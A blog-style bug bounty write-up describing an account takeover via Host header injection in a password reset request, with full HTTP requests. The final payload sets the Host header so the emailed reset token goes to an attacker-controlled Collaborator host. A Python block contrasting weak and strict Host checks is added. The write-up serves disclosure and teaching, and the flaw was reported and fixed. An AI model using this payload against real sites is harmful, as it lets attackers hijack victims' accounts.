Interesting Story of an Account Takeover Vulnerability

Deepanshu

Sep 12, 2024


This blog was originally published here by Deepanshu


Hello everyone, I'm Deepanshu, a security researcher from India.


I hope you’re all doing well! Today, I want to share a fascinating account takeover vulnerability that I recently discovered.


I got an invite to a private bug bounty program on hackerone.com. The scope was very limited and the program was four years old; initially it looked secure, but I decided to give it a try.


So I went straight to the forgot-password functionality of the company's main website.


I entered my email in the forgot-password field and intercepted the request.

POST /auth/realms/Redacted/login-actions/reset-credentials?session_code=AbcdiQqKwDBsJcdIjZpAFW3&client_id=account&tab_id=Abcdii7y9i3qwXs HTTP/1.1
Host: login.redacted.com
Cookie: AUTH_SESSION_ID=fc59cdd34026abcd; KC_RESTART=AbcdiSldUIiiaXNFs
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 34
Origin: https://login.redacted.com
Referer: https://login.redacted.com/auth/realms/redacted/login-actions/reset-credentials?client_id=account&tab_id=Abcdi3qwXs
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

username=testemail%40gmail.com

Looking at this forgot-password request, my first thought was to test for Host header injection.


I put my Burp Collaborator URL in the "Host" header like this:

Host: login.redacted.com.BurpcollaboratorUrl.com

I sent the request and nothing happened; it didn't work.


I tried adding headers like "X-Forwarded-Host" and many more, but none of them worked.


So now what? Let's think about it the other way.

After multiple attempts, I found that anything in the Host header is rejected unless it ends with "login.company.com". As you saw earlier, I had appended my Burp Collaborator URL at the end, which is why it didn't work.


So I tried putting the Burp Collaborator link at the start of the Host header:

Host: burpcollaboratorUrl.com.login.redacted.com

With this I received a forgot-password link in my email, and it looked like this:

https://abc.burpcollaborator.login.redacted.com/auth/realms/login-actions/action-token?key=ey....

Here the Burp Collaborator URL was reflected into the password reset link along with the token, but if you look closely, the server removed the ".com" of the Collaborator URL and appended the company domain after it.


Technically, this makes it an unknown host: a victim clicking it will see a "site can't be reached" error. So as an attacker we cannot get any HTTP pingbacks to our Burp server that would give us the reset token.

For the request to work and for the token to reach us, we need the password reset link to look like this:

https://abc.burpcollaborator.com/auth/realms/login-actions/action-token?key=ey....

Finally, I tried putting a colon ( : ) in the Host header like this:

Host: burpcollaboratorurl.com:login.redacted.com

The final request looks like this:

POST /auth/realms/redacted/login-actions/reset-credentials?session_code=Jabcde HTTP/1.1
Host: abcd.burpcollaborator.com:login.redacted.com
Cookie: AUTH_SESSION_ID=abcdfc59cdd34026.keycloak-482-keycloak-aaalzz4; Lpaa1sXBBnfZiwyvqXMPW2E5/ikwW6fuTZCg+XlvBMY9yeptovpOaJM2xmkK0=; _ga=GA1.2.1343917884.1641975182;
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 34
Origin: https://login.redacted.com
Referer: https://login.redacted.com/auth/realms/login-actions/reset-credentials
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

username=testemail%40gmail.com

I sent the request and BoooM!

This time the check was bypassed and the server sent the link the way we wanted it.

You can see that now the Burp Collaborator URL will work and has the token attached to it.

Clicking on it resolves to the Collaborator server, and I got HTTP pingbacks.

I successfully obtained the reset token and was able to completely take over the victim's account.
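As an added, defender-side illustration (this is not code from the original write-up or from the vendor, and the vendor's own explanation is not reproduced here): a suffix-only Host check of the kind the observations above imply accepts both "prefix" payloads, a host:port split shows that a URL parser reads everything after the colon as the port, and a strict allowlist check plus a configured base URL rejects them. The hostnames, the allowlist and the reset path are assumed values modelled on the redacted ones in the post.

```python
from typing import Optional, Tuple

# Assumed configuration: the site's only legitimate public hostname and a fixed base URL.
ALLOWED_HOSTS = {"login.redacted.com"}
BASE_URL = "https://login.redacted.com"
RESET_PATH = "/auth/realms/redacted/login-actions/action-token"


def weak_host_check(host_header: str) -> bool:
    """Suffix-only check reconstructed from the write-up's observations (weak)."""
    return host_header.lower().endswith("login.redacted.com")


def split_host_port(host_header: str) -> Tuple[str, Optional[str]]:
    """Split a Host value the way a URL parser does: text after the last colon is the port."""
    if host_header.startswith("["):                      # bracketed IPv6 literal
        end = host_header.find("]")
        rest = host_header[end + 1:]
        port = rest[1:] if rest.startswith(":") else None
        return host_header[:end + 1].lower(), port
    hostname, sep, port = host_header.rpartition(":")
    if not sep:
        return host_header.lower(), None
    return hostname.lower(), port


def strict_host_check(host_header: str) -> bool:
    """Exact allowlist match on the hostname part; the port, if present, must be numeric."""
    hostname, port = split_host_port(host_header)
    if hostname not in ALLOWED_HOSTS:
        return False
    if port is None:
        return True
    return port.isdigit() and 1 <= int(port) <= 65535


def build_reset_link(token: str) -> str:
    """Safe builder: the link never depends on the request's Host header."""
    return f"{BASE_URL}{RESET_PATH}?key={token}"


# Constructed probes mirroring the three Host values tried in the post, plus the real one.
PROBES = [
    "login.redacted.com",
    "login.redacted.com.burpcollaboratorurl.com",
    "burpcollaboratorurl.com.login.redacted.com",
    "burpcollaboratorurl.com:login.redacted.com",
]


def evaluate(probes=PROBES) -> dict:
    """Map each probe to (weak verdict, strict verdict, hostname a URL parser would use)."""
    return {h: (weak_host_check(h), strict_host_check(h), split_host_port(h)[0]) for h in probes}
```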


Now you might be wondering why and how that colon ":" worked in the Host header. Here is the explanation from the company's internal team.

The company fixed it within a week and awarded me a good bounty.

I hope you all liked the write-up. Goodbye until the next write-up 👋.


Cheers! — Golu_369
